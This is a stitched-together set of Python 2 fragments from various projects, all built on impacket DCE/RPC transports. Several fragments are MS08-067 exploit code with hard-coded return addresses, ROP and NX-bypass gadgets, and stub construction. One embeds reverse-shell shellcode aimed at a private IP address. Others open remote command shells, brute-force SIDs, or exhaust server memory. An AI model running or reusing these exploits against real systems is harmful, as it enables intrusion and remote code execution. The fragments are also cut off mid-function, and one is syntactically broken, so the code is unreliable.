ファイル: 40279.py プロジェクト: zone-h/exploit-database
    def __DCEPacket(self):
	"""Select the OS-specific ``jumper`` bytes, connect the DCE/RPC
	transport and assemble ``self.__stub``.

	``self.os`` is a string code ('1'..'7'); each branch prints the build it
	targets and picks hard-coded, build-specific addresses, so the stub only
	fits the exact OS/SP/language it names. Any other code prints
	'Not supported OS version' and terminates the process via sys.exit(-1).

	Side effects: ``self.__trans`` (transport to the browser named pipe on
	``self.target``, connected here with no error handling),
	``self.__dce`` (bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0, the
	SRVSVC interface) and ``self.__stub``. Returns None.

	``nonxjmper``, ``disableNXjumper``, ``generate_rop``, ``shellcode``,
	``transport``, ``uuid`` and ``sys`` are module-level names that are not
	defined in this block.

	NOTE(review): the body mixes tab indentation (OS selection) with
	8-space indentation (connection setup); Python 2 treats both as one
	level, but the ``elif (self.os=='2')`` line is indented one level deeper
	than its siblings and is a syntax error as pasted.
	"""
	if (self.os=='1'):
		print 'Windows XP SP0/SP1 Universal\n'
		ret = "\x61\x13\x00\x01"
		jumper = nonxjmper % (ret, ret)
		# NOTE(review): the next line is mis-indented (see docstring).
		elif (self.os=='2'):
		print 'Windows 2000 Universal\n'
		ret = "\xb0\x1c\x1f\x00"
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='3'):
		print 'Windows 2003 SP0 Universal\n'
		ret = "\x9e\x12\x00\x01"  #0x01 00 12 9e
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='4'):
		print 'Windows 2003 SP1 English\n'
		ret_dec = "\x8c\x56\x90\x7c"  #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
		ret_pop = "\xf4\x7c\xa2\x7c"  #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
		jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
		disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
		jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
	elif (self.os=='5'):
		print 'Windows XP SP3 French (NX)\n'
		ret = "\x07\xf8\x5b\x59"  #0x59 5b f8 07 
		disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 
		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
	elif (self.os=='6'):
		print 'Windows XP SP3 English (NX)\n'
		ret = "\x07\xf8\x88\x6f"  #0x6f 88 f8 07 
		disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 
		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
	elif (self.os=='7'):
		print 'Windows XP SP3 English (AlwaysOn NX)\n'
		# RVA table consumed by generate_rop() (defined elsewhere in the module).
		rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
		jumper = generate_rop(rvasets)+"AB"  #the nonxjmper also work in this case.
	else:
		print 'Not supported OS version\n'
		sys.exit(-1)
	print '[-]Initiating connection'

        # Transport to the browser named pipe on the target; connect() errors are not handled here.
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)

        self.__trans.connect()

        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target

        self.__dce = self.__trans.DCERPC_class(self.__trans)

        # Bind to the SRVSVC interface (UUID, version '3.0').
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))




        # Request stub: a hand-laid-out UTF-16LE path buffer (filler, shellcode, jumper)
        # followed by fixed server/prefix fields; every byte position matters.
        path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00"  + jumper + "\x00" * 2

        server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
        prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"

        self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"

        # Nothing is returned; the caller reads self.__stub / self.__dce.
        return
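    def run(self, addr):
        """Open an interactive RemoteShell on *addr*, trying each configured protocol.

        For every name in self.__protocols, CMDEXEC.KNOWN_PROTOCOLS gives the
        string-binding template (formatted with *addr*) and the port. In
        'SERVER' mode a daemon SMBServer thread is started before the shell
        and stopped after cmdloop() returns normally.

        Args:
            addr: host name or address substituted into the binding template.

        Raises:
            Whatever the transport, RemoteShell or cmdloop raise. The error is
            printed and stdout flushed first, then the exception is re-raised.
            The previous handler re-raised before printing, which left its
            print/flush/exit lines unreachable.
        """
        for protocol in self.__protocols:
            protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]

            print "Trying protocol %s..." % protocol
            print "Creating service %s..." % self.__serviceName

            stringbinding = protodef[0] % addr

            rpctransport = transport.DCERPCTransportFactory(stringbinding)
            rpctransport.set_dport(port)

            # Both setters exist only on some protocol sequences.
            if hasattr(rpctransport, 'preferred_dialect'):
                rpctransport.preferred_dialect(SMB_DIALECT)
            if hasattr(rpctransport, 'set_credentials'):
                rpctransport.set_credentials(self.__username, self.__password,
                                             self.__domain, self.__lmhash,
                                             self.__nthash)

            try:
                if self.__mode == 'SERVER':
                    serverThread = SMBServer()
                    serverThread.daemon = True
                    serverThread.start()
                self.shell = RemoteShell(self.__share, rpctransport, self.__mode)
                self.shell.cmdloop()
                if self.__mode == 'SERVER':
                    # Only reached on a clean exit from the shell.
                    serverThread.stop()
            except Exception, e:
                # Report, then propagate so the caller still sees the traceback.
                print e
                sys.stdout.flush()
                raise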
    def run(self, addr, smbcmd):
        """Run *smbcmd* on *addr* and return its output.

        Iterates self.__protocols, but the loop body either returns the
        command output or returns "" from the exception handler, so only
        the first protocol is ever attempted. SmbExecute(...).execute_remote
        does the work; the executor is kept on self.executor.

        Args:
            addr: host name or address formatted into the protocol's
                string-binding template (CMDEXEC.KNOWN_PROTOCOLS[...][0]).
            smbcmd: the command string handed to execute_remote.

        Returns:
            The remote output, or "" when SmbExecute raised. KeyboardInterrupt
            is caught here as well, so Ctrl-C is printed and swallowed rather
            than propagated.
        """
        for protocol in self.__protocols:
            protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
            binding_template = protodef[0]
            port = protodef[1]

            print "\n\n [*] Trying protocol " + protocol + " on " + addr
            print " [*] Creating service %s..." % self.__serviceName

            rpctransport = transport.DCERPCTransportFactory(binding_template % addr)
            rpctransport.set_dport(port)

            # Both setters exist only on some protocol sequences.
            if hasattr(rpctransport, 'preferred_dialect'):
                rpctransport.preferred_dialect(SMB_DIALECT)
            if hasattr(rpctransport, 'set_credentials'):
                rpctransport.set_credentials(
                    self.__username, self.__password, self.__domain,
                    self.__lmhash, self.__nthash)

            try:
                self.executor = SmbExecute(
                    self.__share, rpctransport, self.__mode,
                    self.__serviceName, self.__outputfile)
                return self.executor.execute_remote(smbcmd)
            except (Exception, KeyboardInterrupt), e:
                print e
                sys.stdout.flush()
                return ""
ファイル: rpcdump.py プロジェクト: vpereira/packetpig
    def dump(self, addr):
        """Dumps the list of endpoints registered with the mapper
        listening at addr. Addr is a valid host name or IP address in
        string format.
        """

        print 'Retrieving endpoint list from %s' % addr

        # Try all requested protocols until one works.
        entries = []
        for protocol in self.__protocols:
            protodef = RPCDump.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]

            print "Trying protocol %s..." % protocol
            stringbinding = protodef[0] % addr

            rpctransport = transport.DCERPCTransportFactory(stringbinding)
            rpctransport.set_dport(port)
            if hasattr(rpctransport, 'set_credentials'):
                # This method exists only for selected protocol sequences.
                rpctransport.set_credentials(self.__username, self.__password)

            try:
                entries = self.__fetchList(rpctransport)
            except Exception, e:
                print 'Protocol failed: %s' % e
            else:
                # Got a response. No need for further iterations.
                break
ファイル: lookupsid.py プロジェクト: yinhui1150/impacket
    def dump(self, addr):

        print 'Brute forcing SIDs at %s' % addr

        # Try all requested protocols until one works.
        entries = []
        for protocol in self.__protocols:
            protodef = LSALookupSid.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]

            print "Trying protocol %s..." % protocol
            stringbinding = protodef[0] % addr

            rpctransport = transport.DCERPCTransportFactory(stringbinding)
            rpctransport.set_dport(port)
            if hasattr(rpctransport, 'set_credentials'):
                # This method exists only for selected protocol sequences.
                rpctransport.set_credentials(self.__username, self.__password,
                                             self.__domain, self.__lmhash,
                                             self.__nthash)

            try:
                entries = self.__bruteForce(rpctransport, self.__maxRid)
            except Exception, e:
                print 'Protocol failed: %s' % str(e)
                raise
            else:
                # Got a response. No need for further iterations.
                break
    def play(self, addr):
        """Try each configured protocol against *addr* until doStuff succeeds.

        For every name in self.__protocols the ATSVC_EXEC.KNOWN_PROTOCOLS
        entry gives a string-binding template (formatted with *addr*) and a
        port. Credentials are applied only when the transport supports
        set_credentials. The first protocol for which self.doStuff returns
        without raising ends the loop; a failure is printed and the next
        protocol is tried. Returns None.
        """
        for protocol in self.__protocols:
            protodef = ATSVC_EXEC.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]

            print "Trying protocol %s..." % protocol

            rpctransport = transport.DCERPCTransportFactory(protodef[0] % addr)
            rpctransport.set_dport(port)
            if hasattr(rpctransport, 'set_credentials'):
                # Only some protocol sequences expose set_credentials.
                rpctransport.set_credentials(
                    self.__username, self.__password, self.__domain,
                    self.__lmhash, self.__nthash)
            try:
                self.doStuff(rpctransport)
            except Exception, e:
                print 'Protocol failed: %s' % e
                continue
            # Got a response; no further protocols are tried.
            break
    def __DCEPacket(self):
        """Connect to the browser named pipe on ``self.target``, bind the
        SRVSVC interface (4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0) and
        assemble the request stub in ``self.__stub``.

        Side effects: ``self.__trans`` (connected transport; connect errors
        are not handled here), ``self.__dce`` and ``self.__stub``.
        Returns None. ``shellcode`` and ``payload`` are module-level names
        not defined in this block; ``transport`` and ``uuid`` are likewise
        imported elsewhere.
        """
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory(
            'ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(
            uuid.uuidtup_to_bin(
                ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

        # Constructing Malicious Packet
        # Fixed-layout stub built by concatenation: length/offset words,
        # ``shellcode``, 64 bytes of 'A' filler, then ``payload`` and the
        # trailing fields. The order of these lines is the wire layout.
        self.__stub = '\x01\x00\x00\x00'
        self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub += shellcode
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub += '\x00\x00\x00\x00'
        self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub += payload
        self.__stub += '\x00\x00\x00\x00'
        self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub += '\x01\x00\x00\x00'
        # Nothing is returned; the caller reads self.__stub / self.__dce.
        return
ファイル: smb_exec.py プロジェクト: zhangfeifei02/python
    def run(self, addr):
        """Open a RemoteShell on *addr*, trying each configured protocol.

        Every name in self.__protocols maps through CMDEXEC.KNOWN_PROTOCOLS
        to a string-binding template and a port. Progress is echoed in
        GREEN; an exception from RemoteShell/cmdloop is echoed in RED and
        the next protocol is tried. Returns None.

        Args:
            addr: host name or address formatted into the binding template.
        """
        for protocol in self.__protocols:
            protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]

            color.echo("[*] Trying protocol %s..." % protocol, GREEN)
            color.echo("[*] Creating service %s..." % self.__serviceName,
                       GREEN)

            rpctransport = transport.DCERPCTransportFactory(protodef[0] % addr)
            rpctransport.set_dport(port)

            # Both setters exist only on some protocol sequences.
            if hasattr(rpctransport, 'preferred_dialect'):
                rpctransport.preferred_dialect(SMB_DIALECT)
            if hasattr(rpctransport, 'set_credentials'):
                rpctransport.set_credentials(
                    self.__username, self.__password, self.__domain,
                    self.__lmhash, self.__nthash)

            try:
                self.shell = RemoteShell(
                    self.__share, rpctransport, self.__mode)
                self.shell.cmdloop()
            except Exception, e:
                color.echo("[!] %s" % e, RED)
def main(args):
    if len(args) != 4:
        print "usage: opdump.py hostname port interface version"
        return 1

    host, port, interface, version = args[0], int(args[1]), args[2], args[3]

    stringbinding = "ncacn_ip_tcp:%s" % host
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.set_dport(port)

    results = []
    for i in range(256):
        dce = trans.get_dce_rpc()
        dce.connect()

        iid = uuid.uuidtup_to_bin((interface, version))
        dce.bind(iid)

        dce.call(i, "")
        try:
            resp = dce.recv()
        except dcerpc.Exception, e:
            result = str(e)
        else:
            result = "success"

        dce.disconnect()

        results.append(result)
 def __DCEPacket(self):
     print '[-]Initiating connection'
     try:
         self.__trans = transport.DCERPCTransportFactory(
             'ncacn_np:%s[\\pipe\\browser]' % self.target)
         self.__trans.connect()
     except Exception, e:
         print "\n    Something went wrong. Might not be vulnerable..\n    Printing error: " + str(
             e) + "\n\n    Returning to exploits menu..."
ファイル: exploit.py プロジェクト: yinhui1150/impacket
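    def setupConnection(self):
        """Build self.trans / self.smb from self.params and patch the SMB
        object's operations as requested.

        self.params values are strings converted with int() here:
          proto           index into self.protocols (string-binding template,
                          formatted with self.params)
          port            destination port; stored back into params as int
          transport_frag  max DCE/RPC fragment size for the transport
          tree_connect    0 -> smb.tree_connect replaces tree_connect_andx
          open            0 -> self.open, 1 -> self.open_andx
          read            0 -> smb.read, 2 -> smb.read_raw,
                          3 -> self.read_cycling (original kept as
                          smb.original_read_andx); 1 keeps the default
          write           same scheme with smb.write / write_raw /
                          self.write_cycling
          smb_user, smb_passwd, smb_lmhash, smb_nthash  SMB credentials

        The SMB setup is best-effort: any exception is reported on stdout
        and swallowed, leaving whatever was patched so far in place (the
        previous version silently passed, hiding the failure). Returns None.
        """
        proto = int(self.params['proto'])
        self.params['port'] = int(self.params['port'])

        stringbinding = self.protocols[proto] % self.params

        print "Using stringbinding: %r" % stringbinding

        self.trans = transport.DCERPCTransportFactory(stringbinding)
        self.trans.set_max_fragment_size(int(self.params['transport_frag']))
        self.trans.set_dport(self.params['port'])

        try:
            # SMB parameters handling
            self.trans.setup_smb_server()

            # force building the SMB object so we can change its methods
            self.smb = self.trans.get_smb_server()

            # tree_connect selection (any other value keeps tree_connect_andx)
            if int(self.params['tree_connect']) == 0:
                self.smb.tree_connect_andx = self.smb.tree_connect

            # open selection
            arg = int(self.params['open'])
            if arg == 0:
                self.smb.nt_create_andx = self.open
            elif arg == 1:
                self.smb.nt_create_andx = self.open_andx

            # read selection (1 keeps the default read_andx)
            arg = int(self.params['read'])
            if arg == 0:
                self.smb.read_andx = self.smb.read
            elif arg == 2:
                self.smb.read_andx = self.smb.read_raw
            elif arg == 3:
                # saved for read_cycling (defined elsewhere on this class)
                self.smb.original_read_andx = self.smb.read_andx
                self.smb.read_andx = self.read_cycling

            # write selection (1 keeps the default write_andx)
            arg = int(self.params['write'])
            if arg == 0:
                self.smb.write_andx = self.smb.write
            elif arg == 2:
                self.smb.write_andx = self.smb.write_raw
            elif arg == 3:
                # saved for write_cycling (defined elsewhere on this class)
                self.smb.original_write_andx = self.smb.write_andx
                self.smb.write_andx = self.write_cycling

            # smb credentials
            self.trans.set_credentials(self.params['smb_user'],
                                       self.params['smb_passwd'],
                                       lm_hash=self.params['smb_lmhash'],
                                       nt_hash=self.params['smb_nthash'])

        except Exception, e:
            # Best-effort, but do not hide the failure: without this message
            # a broken SMB setup only surfaces later as an unrelated error.
            print "SMB setup failed (continuing): %s" % e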
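def main(args):
  """Entry point for ifmap.py: list the RPC interfaces a host exposes on a TCP port.

  Usage: ifmap.py <host> <port>. Connects to the DCE/RPC management
  interface (afa8bd80-7d8a-11c9-bef4-08002b102989 v1.0) to enumerate the
  registered interface UUIDs, then probes every UUID from that list and
  from the module-level ``uuid_database`` with a bind, reporting for each
  whether it is listed and whether it is actually listening.

  Args:
      args: command-line arguments without the program name.

  Returns:
      1 on a usage error, otherwise None.
  """
  if len(args) != 2:
    print "usage: ./ifmap.py <host> <port>"
    return 1

  host = args[0]
  port = int(args[1])

  stringbinding = "ncacn_ip_tcp:%s" % host
  trans = transport.DCERPCTransportFactory(stringbinding)
  trans.set_dport(port)

  dce = trans.get_dce_rpc()
  dce.connect()

  iid = uuid.uuidtup_to_bin(("afa8bd80-7d8a-11c9-bef4-08002b102989", "1.0"))
  dce.bind(iid)

  dcemgmt = mgmt.DCERPCMgmt(dce)
  ifids = dcemgmt.inq_if_ids()

  uuidtups = set(
    uuid.bin_to_uuidtup(ifids.get_if_binuuid(index))
    for index in range(ifids.get_ifcount())
  )

  dce.disconnect()

  probes = uuidtups | uuid_database

  for tup in sorted(probes):
    # One connection per probe; the bind outcome tells whether the interface
    # is served. NOTE(review): there is no disconnect() inside the loop --
    # confirm connect() on an already-used dce object is harmless.
    dce.connect()

    binuuid = uuid.uuidtup_to_bin(tup)
    try:
      dce.bind(binuuid)
    except dcerpc.Exception, e:
      resp = dcerpc.MSRPCBindAck(str(e.args[1]))
      # (Result, Reason) == (2, 1) in the first context item is treated as
      # "interface not served" (presumably provider_rejection /
      # abstract_syntax_not_supported); anything else is unexpected.
      if (resp.getCtxItem(1)['Result'], resp.getCtxItem(1)['Reason']) == (2, 1):
        listening = False
      else:
        raise
    else:
      listening = True

    # Computed once here (the original assigned it twice per iteration).
    listed = tup in uuidtups
    otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
    if listed or listening:
      print "%r: %s, %s" % (
        tup,
        "listed" if listed else "other version listed" if otherversion else "not listed",
        "listening" if listening else "not listening"
      )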
 def test_connection(self):
     """Connect to the endpoint mapper over self.stringBinding and bind it.

     Uses the password credentials (self.username/password/domain) when the
     protocol sequence's transport accepts them; the test passes if
     connect(), bind(epm.MSRPC_UUID_PORTMAP) and disconnect() all return.
     """
     trans = transport.DCERPCTransportFactory(self.stringBinding)
     trans.set_dport(self.dport)
     if hasattr(trans, 'set_credentials'):
         # Not every protocol sequence takes credentials.
         trans.set_credentials(self.username, self.password, self.domain)
     rpc = trans.get_dce_rpc()
     rpc.connect()
     rpc.bind(epm.MSRPC_UUID_PORTMAP)
     rpc.disconnect()
    def __connect(self):
        '''
        Open the DCE/RPC transport to the Computer Browser service named pipe
        on self.target and connect it, storing the transport on self.__trans.
        Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html

        Raises connectionException when the SMB session is refused; the
        original smb.SessionError is not chained or logged.
        '''
        binding = 'ncacn_np:%s[\\pipe\\browser]' % self.target
        try:
            self.__trans = transport.DCERPCTransportFactory(binding)
            self.__trans.connect()
        except smb.SessionError:
            raise connectionException('access denied (RestrictAnonymous is probably set to 2)')
 def test_connectionHashes(self):
     """Connect and bind to the endpoint mapper using LM/NT hashes.

     self.hashes is 'LMHASH:NTHASH'; the password argument is passed
     empty. Credentials are applied only when the protocol sequence's
     transport exposes set_credentials.
     """
     trans = transport.DCERPCTransportFactory(self.stringBinding)
     trans.set_dport(self.dport)
     if hasattr(trans, 'set_credentials'):
         lmhash, nthash = self.hashes.split(':')
         # Not every protocol sequence takes credentials.
         trans.set_credentials(self.username, '', self.domain, lmhash, nthash)
     rpc = trans.get_dce_rpc()
     rpc.connect()
     rpc.bind(epm.MSRPC_UUID_PORTMAP)
     rpc.disconnect()
 def test_dceFragmentation(self):
     """Endpoint-mapper lookup with the DCE fragment size set to 1.

     Hash credentials (self.hashes as 'LM:NT', empty password) are set on
     the transport when supported and copied onto the DCE layer with
     set_credentials(*get_credentials()). The lookup result is discarded;
     the test only checks that nothing raises.
     """
     trans = transport.DCERPCTransportFactory(self.stringBinding)
     trans.set_dport(self.dport)
     if hasattr(trans, 'set_credentials'):
         lmhash, nthash = self.hashes.split(':')
         # Not every protocol sequence takes credentials.
         trans.set_credentials(self.username, '', self.domain, lmhash, nthash)
     rpc = trans.get_dce_rpc()
     rpc.set_max_fragment_size(1)  # smallest fragment size
     rpc.set_credentials(*trans.get_credentials())
     rpc.connect()
     rpc.bind(epm.MSRPC_UUID_PORTMAP)
     epm.DCERPCEpm(rpc).lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
     rpc.disconnect()
 def test_packetAnonWINNTPacketPrivacy(self):
     """Endpoint-mapper lookup with RPC_C_AUTHN_WINNT at packet-privacy level.

     Hash credentials (self.hashes as 'LM:NT') plus self.password are set
     on the transport when supported. Auth type and level are configured on
     the DCE object after connect() and before bind(). The lookup result is
     discarded; the test only checks that nothing raises.
     """
     trans = transport.DCERPCTransportFactory(self.stringBinding)
     trans.set_dport(self.dport)
     if hasattr(trans, 'set_credentials'):
         lmhash, nthash = self.hashes.split(':')
         # Not every protocol sequence takes credentials.
         trans.set_credentials(self.username, self.password, self.domain,
                               lmhash, nthash)
     rpc = trans.get_dce_rpc()
     rpc.connect()
     rpc.set_auth_type(dcerpc.RPC_C_AUTHN_WINNT)
     rpc.set_auth_level(dcerpc.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
     rpc.bind(epm.MSRPC_UUID_PORTMAP)
     epm.DCERPCEpm(rpc).lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
     rpc.disconnect()
    def run(self, addr):
        """Run doStuff against *addr* over every configured protocol.

        Each name in self.__protocols maps through PSEXEC.KNOWN_PROTOCOLS to
        a string-binding template and a port. There is no try/except around
        doStuff: the first protocol that raises aborts the loop and the
        exception propagates to the caller. Credentials are set only when
        the transport exposes set_credentials. Returns None.
        """
        for protocol in self.__protocols:
            protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]

            print "Trying protocol %s...\n" % protocol

            rpctransport = transport.DCERPCTransportFactory(protodef[0] % addr)
            rpctransport.set_dport(port)
            if hasattr(rpctransport, 'set_credentials'):
                # Only some protocol sequences take credentials.
                rpctransport.set_credentials(
                    self.__username, self.__password, self.__domain,
                    self.__lmhash, self.__nthash)

            self.doStuff(rpctransport)
    def run(self):
        self.gom.echo()
        self.gom.echo("Trying to exploit ...")
        self.gom.echo()

        pipe = 'browser'
        UUID = ('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')
        host = self.target

        stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
        stringbinding %= {'host': host, 'pipe': pipe}

        MB = 1024 * 1024

        if self.wizard:
            res = raw_input("Memory size [1024]: ")

            if res != "":
                self.memorySize = int(res)

        memory_size = MB * self.memorySize
        query = NetrWkstaUserEnum()
        server = "%s\x00" % (host)
        query['server'] = B1()
        query['server']['id'] = 0x41414141
        query['server']['actual'] = len(server)
        query['server']['max'] = len(server)
        query['server']['str'] = utf16(server)
        query['max_len'] = memory_size

        trans = transport.DCERPCTransportFactory(stringbinding)

        self.gom.echo("[*] Connecting to %s:445 (NULL Session)" %
                      (self.target))

        try:
            trans.connect()

        except Exception, err:
            self.gom.echo("[-] %s" % (err))
            return False
ファイル: ms08_067.py プロジェクト: dc170/bufferOverflows
from impacket.dcerpc import transport
import sys

####################################
# MS08_067 case of study by ly0n
# Greetz: muts,ryujin & offsec team
####################################

try:
    target = sys.argv[1]
    port = 445
except IndexError:
    print "Usage: program host"
    sys.exit()

trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' %
                                         target)
trans.connect()
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# revere shell 192.168.11.5 port 777 by msfpayload
payload = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
           "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
           "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
           "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
           "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
           "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
           "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
           "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
           "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
           "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
           "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f"
    def run(self):
        """Memory-allocation probe against the spoolss named pipe on
        ``self.target``.

        Flow: connect to the spoolss pipe and bind the interface given in
        ``interface``; call OpenPrinterEx for the target host and read the
        20-byte handle from the reply; then call GetPrinterData with
        ``offered`` set to ``self.memorySize`` MiB (asked interactively when
        ``self.wizard`` is true) and inspect the status / size words of the
        reply.

        Returns False if the connection or OpenPrinterEx fails, True when
        the server answers with the out-of-memory status checked below, and
        None otherwise (including the NetBIOSTimeout path, which is reported
        as out of memory). All messages go through ``self.gom.echo``.

        ``OpenPrinterEx``, ``GetPrinterData``, ``B1``, ``B2``, ``pack``,
        ``NetBIOSTimeout``, ``transport`` and ``uuid`` come from the
        enclosing module, not from this block.
        """
        self.gom.echo()
        self.gom.echo("Trying to exploit ...")
        self.gom.echo()

        MB = 1024 * 1024
        host = self.target

        if self.wizard:
            res = raw_input("Memory size [1024]: ")

            if res != "":
                self.memorySize = int(res)

        memory_size = MB * self.memorySize
        # (pipe name, interface UUID, interface version)
        interface = ('spoolss', '12345678-1234-abcd-ef00-0123456789ab', '1.0')

        stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
        stringbinding %= {
            'host': host,
            'pipe': interface[0],
        }

        trans = transport.DCERPCTransportFactory(stringbinding)

        # Port 445 is only what the message says; the transport picks the port.
        self.gom.echo("[*] Connecting to %s:445" % (host))
        try:
            trans.connect()
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
            self.gom.echo("[-] Connect failed")
            return False

        self.gom.echo("[+] Connected")

        dce = trans.DCERPC_class(trans)
        dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))

        # OpenPrinterEx request; strings are UTF-16LE with explicit lengths.
        query = OpenPrinterEx()
        printer = "\\\\%s\x00" % (host)
        query['printer'] = B1()
        query['printer']['id'] = 0x41414141
        query['printer']['max'] = len(printer)
        query['printer']['actual'] = len(printer)
        query['printer']['str'] = printer.encode('utf_16_le')

        client = "\\\\h07\x00"
        query['client'] = B2()
        query['client']['max'] = len(client)
        query['client']['actual'] = len(client)
        query['client']['str'] = client.encode('utf_16_le')

        user = "******"
        query['user'] = B2()
        query['user']['max'] = len(user)
        query['user']['actual'] = len(user)
        query['user']['str'] = user.encode('utf_16_le')

        dce.call(query.opnum, query)
        raw = dce.recv()
        # First 20 bytes of the reply are the printer handle; all zeros means
        # the call failed and the return code follows at offset 20.
        handle = raw[:20]

        if (handle == ("\x00" * 20)):
            self.gom.echo("[-] ERR: OpenPrinterEx()")
            if (raw[20:] == "\x09\x07\x00\x00"):
                self.gom.echo(
                    "[-] Return code: Invalid printer name (0x00000709)")
            if (raw[20:] == "\x05\x00\x00\x00"):
                self.gom.echo("[-] Return code: Access denied (0x00000005)")
            return False

        # GetPrinterData with the requested 'offered' buffer size.
        query = GetPrinterData()
        value = "blah_blah\x00"
        query['handle'] = handle
        query['value'] = B2()
        query['value']['max'] = len(value)
        query['value']['actual'] = len(value)
        query['value']['str'] = value.encode('utf_16_le')
        query['offered'] = memory_size

        dce.call(query.opnum, query)

        try:
            raw = dce.recv()
            # Reply layout assumed here: status word, then the returned size.
            status = raw[:4]
            r_size = raw[4:8]

            if (status == "\x1b\x00\x00\x1c"):
                self.gom.echo("[-] Memory allocation error, out of memory")
                return True
            if (r_size == pack("<L", memory_size)):
                self.gom.echo("[+] Memory allocated!")

        except NetBIOSTimeout, err:
            # A timeout is interpreted as the server having run out of memory.
            self.gom.echo("[+] %s" % (err))
            self.gom.echo("[+] %s: Out of memory" % (host))
